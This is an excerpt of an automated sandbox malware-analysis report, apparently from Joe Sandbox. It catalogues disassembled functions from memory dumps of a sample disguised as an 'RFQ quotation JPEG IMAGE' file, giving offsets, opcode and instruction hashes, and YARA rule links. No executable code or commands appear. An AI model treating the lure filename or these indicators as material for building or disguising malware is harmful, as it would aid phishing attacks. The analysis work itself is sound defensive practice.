                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: Teeq
                          • API String ID: 0-348098666
                          • Opcode ID: 0f35ca885737afc980da7a68dc415f63457a3b97a207d99c96dbec112e4e2053
                          • Instruction ID: f617aed24561f708b308c8973d9657cb34c0d883d3d09cf3aaed62d211183906
                          • Opcode Fuzzy Hash: 0f35ca885737afc980da7a68dc415f63457a3b97a207d99c96dbec112e4e2053
                          • Instruction Fuzzy Hash: 5CF0F8B4A5122A8FCBA4DF28D884BEEB7B1FB49314F1081E9941DA7754DA301E84DF50
                          Function 06540765 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: >
                          • API String ID: 0-325317158
                          • Opcode ID: 4da72f628b79501f1b0c231acc635459c3f063eef6d229430d7b751a1ebc195b
                          • Instruction ID: 9705fad6387655ca4abe98028f977dfd117d5c585a181951f3c7886ee5e44a08
                          • Opcode Fuzzy Hash: 4da72f628b79501f1b0c231acc635459c3f063eef6d229430d7b751a1ebc195b
                          • Instruction Fuzzy Hash: 55D05B706066188FDB90EF68D488D9D77B9FB44304F204995D40697245EB755DC5CF40
                          Function 06540D0E Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: >
                          • API String ID: 0-325317158
                          • Opcode ID: 3e5cd0ff75cd3cac19c9ec35a30233b2ea8cfa51a68fbf6b1d7febfe3f273fa4
                          • Instruction ID: 9705fad6387655ca4abe98028f977dfd117d5c585a181951f3c7886ee5e44a08
                          • Opcode Fuzzy Hash: 3e5cd0ff75cd3cac19c9ec35a30233b2ea8cfa51a68fbf6b1d7febfe3f273fa4
                          • Instruction Fuzzy Hash: 55D05B706066188FDB90EF68D488D9D77B9FB44304F204995D40697245EB755DC5CF40
                          Function 06500728 Relevance: .4, Instructions: 437COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f6ad4634cdbdeefd1271de82f8743a3928c00bd37667b715b4392e38d6193be3
                          • Instruction ID: 0b29e5addf681ce424f45af22aecc70981f8087798d202816d9abea2ac57b414
                          • Opcode Fuzzy Hash: f6ad4634cdbdeefd1271de82f8743a3928c00bd37667b715b4392e38d6193be3
                          • Instruction Fuzzy Hash: 26121B34A102198FDB54EF68C894B9DB7B2BF89300F5085A8D54AAB395DB70ED85CF90
                          Function 063E142C Relevance: .3, Instructions: 347COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111378217.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06380000, based on PE: true
                          • Associated: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6380000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec89858e241cb4c9edc33138af199d86d235b9b50a42d927af60104c5f685714
                          • Instruction ID: ca2fab94cd6c910580c605fe5e7f01590e5fc81b6a28286d47564eebeaebbd81
                          • Opcode Fuzzy Hash: ec89858e241cb4c9edc33138af199d86d235b9b50a42d927af60104c5f685714
                          • Instruction Fuzzy Hash: A0028174A1122A8FCBA5DF28C984B99B7B6FF48310F5081E9E50DA7355DB30AE81CF54
                          Function 0654AE88 Relevance: .3, Instructions: 268COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8ef2fd363e2e40f835f3967e5185f8e8dd85d3702d1da4ca183750db168a24c
                          • Instruction ID: 726785618335b20e22aa01a487005a395e31ceba0ae328ef8408dd92ba37e8ab
                          • Opcode Fuzzy Hash: e8ef2fd363e2e40f835f3967e5185f8e8dd85d3702d1da4ca183750db168a24c
                          • Instruction Fuzzy Hash: 05A1D135B022149FDB54EFA8D984AADBBB2FF89315F2080AAE511D7380CB35DD41CB50
                          Function 06509989 Relevance: .2, Instructions: 235COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b6227d3b704f161e39c45793fc670d6dc6963aba5b0655a8ca7cac176be83273
                          • Instruction ID: 4b0379edc2da27a1148838b57df5ec06b947a63b575bd860f8046cb8ca3c63ef
                          • Opcode Fuzzy Hash: b6227d3b704f161e39c45793fc670d6dc6963aba5b0655a8ca7cac176be83273
                          • Instruction Fuzzy Hash: 04B11B74E00258DFEB54DFA8D944BADBBF2FB89300F2050A9D409AB299DB349D85CF01
                          Function 065016D0 Relevance: .2, Instructions: 226COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 242a56e3ccca5dea8e5e08db38e06f84b39136cfd70cbf5baaf0c360981fafbd
                          • Instruction ID: f5c2d1e5732aecb65ad0e76b9ff7e42285fcc94d195b81542076a9d68ffe8208
                          • Opcode Fuzzy Hash: 242a56e3ccca5dea8e5e08db38e06f84b39136cfd70cbf5baaf0c360981fafbd
                          • Instruction Fuzzy Hash: 86915A34B10614DFDB54DFA8D898A6EB7B6FF89700F1040A9E5069B3A1CB34ED42CB91
                          Function 0141EEE0 Relevance: .2, Instructions: 208COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dfbfb44d2605aa67d87dd82cee375325772c18b643a912c684c68f3bd05cb30f
                          • Instruction ID: f1488fca81f09e42687596577ca855f72219d097564ecbbe8afe0e5cf43ae89c
                          • Opcode Fuzzy Hash: dfbfb44d2605aa67d87dd82cee375325772c18b643a912c684c68f3bd05cb30f
                          • Instruction Fuzzy Hash: 8D811675A00618CFCB15DF68C58499EBBF5FF89310B1580AAE9069B375DB30ED46CB90
                          Function 06509A7F Relevance: .2, Instructions: 183COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ea25c122a7968240eaa50e55f80a7522c616d8ddc8cdf294d5b45658e682a046
                          • Instruction ID: 56132c08636f663d946521d66caf5c229b65c3f693b4e4d58431715bf33b0d90
                          • Opcode Fuzzy Hash: ea25c122a7968240eaa50e55f80a7522c616d8ddc8cdf294d5b45658e682a046
                          • Instruction Fuzzy Hash: 1181E774E04258DFEB54DFA8D584BADBBF2FF89304F2050A9D409AB299DB349985CF01
                          Function 01418C98 Relevance: .2, Instructions: 167COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 055c940fbe75302754b545e482c378625ad7f3cf48d3e861835e05d6f93fec62
                          • Instruction ID: 1843175e70c63a0fbb1f22615e1d0158f80516d5fcaf036afd6317c70d764fa8
                          • Opcode Fuzzy Hash: 055c940fbe75302754b545e482c378625ad7f3cf48d3e861835e05d6f93fec62
                          • Instruction Fuzzy Hash: C251E8B090A3869FD703DB68C86439A7FB1EF57314F4984D7D080DB2A7D638494ACB66
                          Function 065016C0 Relevance: .2, Instructions: 166COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ce767ba44b873ff5303e3f05e65daaec32ea162f43728200aeca72e328ea5c8
                          • Instruction ID: c68c542586e66232d67db319661a06f51106053edef823c6299e67a0f7eb3e7a
                          • Opcode Fuzzy Hash: 7ce767ba44b873ff5303e3f05e65daaec32ea162f43728200aeca72e328ea5c8
                          • Instruction Fuzzy Hash: 87614B34B10614DFDB54DFA8C894A6DB7B6FF88700F1081A9E5169B3A1CB30ED42CB91
                          Function 065045C8 Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 538e5992ae5f2beb13318ee01e1e261da5f8b5b3fb7c89058eb0105533f07440
                          • Instruction ID: d5035bd72f1f5330621e0b500296f81a4de9ba7f7831bb6fc01a49c09782357e
                          • Opcode Fuzzy Hash: 538e5992ae5f2beb13318ee01e1e261da5f8b5b3fb7c89058eb0105533f07440
                          • Instruction Fuzzy Hash: 4041C130F107649FDBA4DB78E54065EBBF2EFC4210B44886ED55AC7A80DB34E941CB81
                          Function 0650A318 Relevance: .1, Instructions: 131COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6048719a1b2ecc6b41ab67d48a1c7d07fae1d6841d4f615401438715a2a11179
                          • Instruction ID: 1f8f14bf836854d44b371bf6ff1be624d15ea529867de8ee6c5a8332b930e5da
                          • Opcode Fuzzy Hash: 6048719a1b2ecc6b41ab67d48a1c7d07fae1d6841d4f615401438715a2a11179
                          • Instruction Fuzzy Hash: 66416A70D052099FEB45CFA9D844AEEBBF6FF8D300F109066E504A7292DB749945CFA1
                          Function 0654C0F0 Relevance: .1, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a7db4673503e3d66e911bc7d026eea96cfdbc9bc0104638b8fbfedebe7e11c61
                          • Instruction ID: 46e4265091ed51c76ccac59e19f6f39bea7aea07b49449f2e297af40ac34fb94
                          • Opcode Fuzzy Hash: a7db4673503e3d66e911bc7d026eea96cfdbc9bc0104638b8fbfedebe7e11c61
                          • Instruction Fuzzy Hash: 8A51F774A012189FEB64EB64CC91F9DB7B1FB99314F1041D9EA09AB391CA71ED81CF90
                          Function 06504B40 Relevance: .1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e08b625e9f76e6bf9ed18b9be3ce37b2f06a99c44fc0b73a55b464992ea4e8b8
                          • Instruction ID: 8f3fd271641aa7007d5afe4dd4615113c053885e8e40bb67441da46d3795a673
                          • Opcode Fuzzy Hash: e08b625e9f76e6bf9ed18b9be3ce37b2f06a99c44fc0b73a55b464992ea4e8b8
                          • Instruction Fuzzy Hash: 37412430B05309AFDB259F28D804BAEBBF6FF86700F10415AE646DB290DB71E905CB91
                          Function 0650F738 Relevance: .1, Instructions: 126COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5638bb31c5a4fcd3ee98a0c3a9b07871ac52e727bc6ffee80dc03caa8558565c
                          • Instruction ID: eb5e5cfa632ec6521eeabc566803ef7d3ce351af9000458551b40632f87a3d16
                          • Opcode Fuzzy Hash: 5638bb31c5a4fcd3ee98a0c3a9b07871ac52e727bc6ffee80dc03caa8558565c
                          • Instruction Fuzzy Hash: 3D511674E012099FDB44DFA9E944AAEBBF6FF89300F10802AE805A7294DB749D41CF91
                          Function 0654741B Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1f8ee760fcd245bfd8d8a0ccdfa349af022b82bed97cc14429c75dddd20eff7
                          • Instruction ID: f13ebf9bfcd6c6c3a40644ee20b7202e1d6da56e4693e5cbcf213b5a9cb340fd
                          • Opcode Fuzzy Hash: c1f8ee760fcd245bfd8d8a0ccdfa349af022b82bed97cc14429c75dddd20eff7
                          • Instruction Fuzzy Hash: EC510770E05219CFEB54DF69D848BADBBF6FF8A308F1094A9D009AB254DB745985CF40
                          Function 0654B598 Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d68aa452688babda4f721d120f29c883af4e28a4230f4c66755b9ffbf4e995f3
                          • Instruction ID: 19b7210603a83b51e588a2d3bde368632bab2a6c2742920b6a8da43bb45f0cd9
                          • Opcode Fuzzy Hash: d68aa452688babda4f721d120f29c883af4e28a4230f4c66755b9ffbf4e995f3
                          • Instruction Fuzzy Hash: 61416C34B002099FDB64EFA9D894FAAB7F2FB84314F108469D8069B394DB35E841CF50
                          Function 065049F8 Relevance: .1, Instructions: 123COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 71721bf45988989228642b852e2712b76257ed47e8dbe9f1628f26aabd553b79
                          • Instruction ID: 3b74d38bc802824166e089c239b3e493861c3b207dd78b114f58f3ca17e65544
                          • Opcode Fuzzy Hash: 71721bf45988989228642b852e2712b76257ed47e8dbe9f1628f26aabd553b79
                          • Instruction Fuzzy Hash: 3F418C75A00744DFDB61CF69C944A6ABBF2FF88200F24896DD68287691D730E944CF91
                          Function 0650F748 Relevance: .1, Instructions: 120COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57c6386a0a82b3d24aebe24c9a64a23a6ad81f5c9af0e7e420dd1c28a12ce562
                          • Instruction ID: 3545964c51fe7457ce02c3aa99f1dbe78ffe9445f0bb4a8827903d3400324fbd
                          • Opcode Fuzzy Hash: 57c6386a0a82b3d24aebe24c9a64a23a6ad81f5c9af0e7e420dd1c28a12ce562
                          • Instruction Fuzzy Hash: 4F41E874E002099FDB44DFA9D944AAEBBF6FF89300F108029E915A7394DB74A945CF91
                          Function 06547466 Relevance: .1, Instructions: 115COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2d177d3bd648457b6f1d2060a6bc2857602c12dcaf157ac164dcf783ef8152d
                          • Instruction ID: 2b34df196baa7809284883f98e4749fbc6c4be415d3ad82b6c879e73842cf539
                          • Opcode Fuzzy Hash: f2d177d3bd648457b6f1d2060a6bc2857602c12dcaf157ac164dcf783ef8152d
                          • Instruction Fuzzy Hash: 5541FD70E05619CFEB54DFA9D8487ADBBF2FF89304F1094A9D009AB255DB745885CF40
                          Function 0650EC28 Relevance: .1, Instructions: 109COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f0cdd168e6b067f9bfd3f5ef1bf493acce9cecd1028db27544bc83c63e5cbca6
                          • Instruction ID: 4e6b7607fc13e023ae2e04adc05ae25354aff6fe58717f97f824400467fd5152
                          • Opcode Fuzzy Hash: f0cdd168e6b067f9bfd3f5ef1bf493acce9cecd1028db27544bc83c63e5cbca6
                          • Instruction Fuzzy Hash: C1413571D14609DFEB54DFA8D8409EDFBB1FF89310F109A2AE419B7250EB71A981CB90
                          Function 065468B8 Relevance: .1, Instructions: 105COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 17138e270f282693f09b78d9977dac16b442cee6ac588e55a95c717d470ee355
                          • Instruction ID: 2b7c3ba201242307138f9021e88036422d00cd650234405262123ed53a8e84c9
                          • Opcode Fuzzy Hash: 17138e270f282693f09b78d9977dac16b442cee6ac588e55a95c717d470ee355
                          • Instruction Fuzzy Hash: 25414574E042089FEB44DFA9D944BEEBBF1BB8A304F1080AAE405B7255D7B54A44CF90
                          Function 0684EE38 Relevance: .1, Instructions: 103COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112820848.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6830000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9618325ef8cb16399ef5d04dfea8abe9dc2b536e1ec7437ff9ab415906f5adf8
                          • Instruction ID: 08810f06ad8168d13e1812962559a761d859fe81e8db811e0a166b435f6ec82a
                          • Opcode Fuzzy Hash: 9618325ef8cb16399ef5d04dfea8abe9dc2b536e1ec7437ff9ab415906f5adf8
                          • Instruction Fuzzy Hash: C3310936A00118EFCB45DF59D988EA9BBB2FF48320F1640A8E6099B372C731EC55CB40
                          Function 0654B738 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e2c9e4cd26a6da08610c99a93fb92c02aa684ef25902d0e77bffd6b1b90bfd4
                          • Instruction ID: 36e61bee564c1a359e79237ab0a1dd9c540feab6545428b00c8fadb6803b8554
                          • Opcode Fuzzy Hash: 7e2c9e4cd26a6da08610c99a93fb92c02aa684ef25902d0e77bffd6b1b90bfd4
                          • Instruction Fuzzy Hash: 17416D31E00216CFDB94DFA9D944ABEBBB1FF88318F0085A9D505E72A1E734D945CB91
                          Function 0650EC38 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1654599e7a09b27409b34ef920b0b9c0cb4af84cd727876a7daaf5e3dcb2c5a2
                          • Instruction ID: 0264715b3fc173582ccea5d3ef2e3ac11a65c0ed5e47987a27cdf31b44072fb2
                          • Opcode Fuzzy Hash: 1654599e7a09b27409b34ef920b0b9c0cb4af84cd727876a7daaf5e3dcb2c5a2
                          • Instruction Fuzzy Hash: 7A413671D04609DFEB54DFA8D8409EDFBB5FF89310F109A2AE419B7250EB71A981CB80
                          Function 065019D9 Relevance: .1, Instructions: 100COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f06f4136eec2610913bd5ea226c21457e1a7e9c58ec4657b29374179c3a67fc2
                          • Instruction ID: 06095f44eb1f7a8c730ce811f658edf63b35df4f640352aeff2470c837081527
                          • Opcode Fuzzy Hash: f06f4136eec2610913bd5ea226c21457e1a7e9c58ec4657b29374179c3a67fc2
                          • Instruction Fuzzy Hash: 06318F35A001189FDB54DFA4D855AEEB7B5FF88310F208069E906BB290CB31AD45CFA4
                          Function 06547910 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12bfda0cb97a87bb3996bd9cb2b8c8838bd4f0b5e52e0a79f88161cda4e9c046
                          • Instruction ID: c639141540d872e5a598924b0a4a154f313f4a7425fa221427d4561ce1e6a919
                          • Opcode Fuzzy Hash: 12bfda0cb97a87bb3996bd9cb2b8c8838bd4f0b5e52e0a79f88161cda4e9c046
                          • Instruction Fuzzy Hash: 8E314474E04209DFDB44CFA9D4446AEBBF6FB8D304F1081A6D814A7344DB399A41CF91
                          Function 06546A82 Relevance: .1, Instructions: 91COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c755a62cd3fc7c91b4684b4634b3f305db61c02aff210c4a392767c2236e9a6
                          • Instruction ID: a6eea4e4b5c2fdb4249f0d3346b8a03cfc24e41eab57f4831ed99549d29d8880
                          • Opcode Fuzzy Hash: 6c755a62cd3fc7c91b4684b4634b3f305db61c02aff210c4a392767c2236e9a6
                          • Instruction Fuzzy Hash: E9311170E00229DFDB44DFAAD844BEEBBB2FF8A314F1490AAE414A7250D7749944CF90
                          Function 0654A978 Relevance: .1, Instructions: 91COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aff2758dbd44d40e745b58b618840475994827e1e9e41e76b6c631b4aaadd074
                          • Instruction ID: e63a9fe2d2337b7a5f1673cf946445a814d9b87063d48ec4e0374d03cb8ab639
                          • Opcode Fuzzy Hash: aff2758dbd44d40e745b58b618840475994827e1e9e41e76b6c631b4aaadd074
                          • Instruction Fuzzy Hash: E3317C75B41209DFDB50DFA8D984ADEBBB5FF88315F208169E411AB364CB319901CB90
                          Function 01413FB0 Relevance: .1, Instructions: 91COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4dae694ec6cdb37afd8b1797ec30b12317e3b9d34f3443780ac4e4b936e107b8
                          • Instruction ID: f45102ac317a4ff634f9dbfc2251e621d39d26f535b729a6031fe6c7de82fe66
                          • Opcode Fuzzy Hash: 4dae694ec6cdb37afd8b1797ec30b12317e3b9d34f3443780ac4e4b936e107b8
                          • Instruction Fuzzy Hash: D331C071A053189FCB05DFB9D450ADDBFF2BF89300F1484AAD444AB2A6DB35AD44CB60
                          Function 0650A378 Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2111899986.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6500000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc9dca8bb25c5f08fddd787274de4e19a3ae41b153af814fa64806387907aaef
                          • Instruction ID: c01006cc48bb51b2ba075ebc58806f694c7b61b9ed53324861536b9936d7e0ff
                          • Opcode Fuzzy Hash: bc9dca8bb25c5f08fddd787274de4e19a3ae41b153af814fa64806387907aaef
                          • Instruction Fuzzy Hash: 2C310674E05219DFEB44CFA9D844AEEBBF6FB8C300F209025E505A7285DB749A44CF90
                          Function 0650DD78 Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
